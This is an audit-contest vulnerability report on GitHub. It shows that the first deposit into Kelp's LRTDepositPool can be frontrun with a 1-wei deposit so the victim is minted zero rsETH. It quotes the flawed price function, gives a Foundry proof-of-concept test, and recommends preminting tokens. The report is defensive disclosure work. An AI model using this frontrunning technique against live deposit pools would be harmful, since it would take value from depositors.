c4-submissions commented 11 months ago

Lines of code

https://github.com/code-423n4/2023-11-kelp/blob/main/src/LRTDepositPool.sol#L136 https://github.com/code-423n4/2023-11-kelp/blob/main/src/LRTDepositPool.sol#L109 https://github.com/code-423n4/2023-11-kelp/blob/main/src/LRTOracle.sol#L52-L79

Vulnerability details

Impact

User who deposits first into LRTDepositPool can be a victim of an inflation attack. An attacker can frontrun the deposit transaction with a "one wei" deposit, which will result in the greatly reduced amount of minted tokens.

Proof of Concept

Here is the flow of the deposit operation:

the user transfers assets to the pool
we get rsETH/ETH price from the oracle
if no rsETH tokens were minted - price is 1 ether, otherwise it is S/T, where S-sum of all asset tokens stored in the protocol in ETH, T-rsETH total supply

use the received price to mint rsETH tokens.

rsethAmountToMint = (amount * lrtOracle.getAssetPrice(asset)) / lrtOracle.getRSETHPrice();

function getRSETHPrice() external view returns (uint256 rsETHPrice) {
    address rsETHTokenAddress = lrtConfig.rsETH();
    uint256 rsEthSupply = IRSETH(rsETHTokenAddress).totalSupply();

    if (rsEthSupply == 0) {
        return 1 ether;
    }

    uint256 totalETHInPool;
    address lrtDepositPoolAddr = lrtConfig.getContract(LRTConstants.LRT_DEPOSIT_POOL);

    address[] memory supportedAssets = lrtConfig.getSupportedAssetList();
    uint256 supportedAssetCount = supportedAssets.length;

    for (uint16 asset_idx; asset_idx < supportedAssetCount;) {
        address asset = supportedAssets[asset_idx];
        uint256 assetER = getAssetPrice(asset);

        uint256 totalAssetAmt = ILRTDepositPool(lrtDepositPoolAddr).getTotalAssetDeposits(asset);
        totalETHInPool += totalAssetAmt * assetER;

        unchecked {
            ++asset_idx;
        }
    }

    return totalETHInPool / rsEthSupply;
}

Let's say Alice was frontrunned while depositing 6 stETH, for simplicity stETH/ETH = 1, S = (6e18 + 1) * 1e18, T = 1 => minted = 6e18 * 1e18 / ((6e18 + 1) * 1e18) = 0

Here is the forge test

contract C4 is LRTDepositPoolTest {
    address public rETHAddress;
    LRTOracle oracle;
    function setUp() public override {
        super.setUp();

        LRTOracle oracleImpl = new LRTOracle();
        ProxyAdmin proxyAdmin = new ProxyAdmin();
        TransparentUpgradeableProxy contractProxy = new TransparentUpgradeableProxy(
            address(oracleImpl),
            address(proxyAdmin),
            ""
        );
        oracle = LRTOracle(address(contractProxy));
        lrtDepositPool.initialize(address(lrtConfig));
        oracle.initialize(address(lrtConfig));
        rETHAddress = address(rETH);

        vm.startPrank(admin);
        lrtConfig.grantRole(LRTConstants.MANAGER, manager);
        lrtConfig.setContract(LRTConstants.LRT_ORACLE, address(oracle));
        lrtConfig.setContract(LRTConstants.LRT_DEPOSIT_POOL, address(lrtDepositPool));
        vm.stopPrank();

        vm.startPrank(manager);
        oracle.updatePriceOracleFor(address(stETH), address(new LRTOracleMock())); 
        oracle.updatePriceOracleFor(address(rETH), address(new LRTOracleMock())); 
        oracle.updatePriceOracleFor(address(cbETH), address(new LRTOracleMock())); 
        vm.stopPrank();
    }

    function testInflationAttack() external {
        // frontrun Alice and deposit 1 wei
        vm.startPrank(bob);
        stETH.approve(address(lrtDepositPool), 1);
        lrtDepositPool.depositAsset(address(stETH), 1);
        vm.stopPrank();
        // Alice will receive nothing
        vm.startPrank(alice);
        stETH.approve(address(lrtDepositPool), 6 ether);
        lrtDepositPool.depositAsset(address(stETH), 6 ether);
        vm.stopPrank();
        assertEq(rseth.balanceOf(alice), 0);
    }
}

Tools Used

Foundry, LRTDepositPoolTest.t.sol

Recommended Mitigation Steps

Consider preminting some amount of rsETH during the pool deployment.

Assessed type

ERC4626

c4-pre-sort commented 11 months ago

raymondfam marked the issue as sufficient quality report

c4-pre-sort commented 11 months ago

raymondfam marked the issue as duplicate of #42

c4-judge commented 10 months ago

fatherGoose1 marked the issue as satisfactory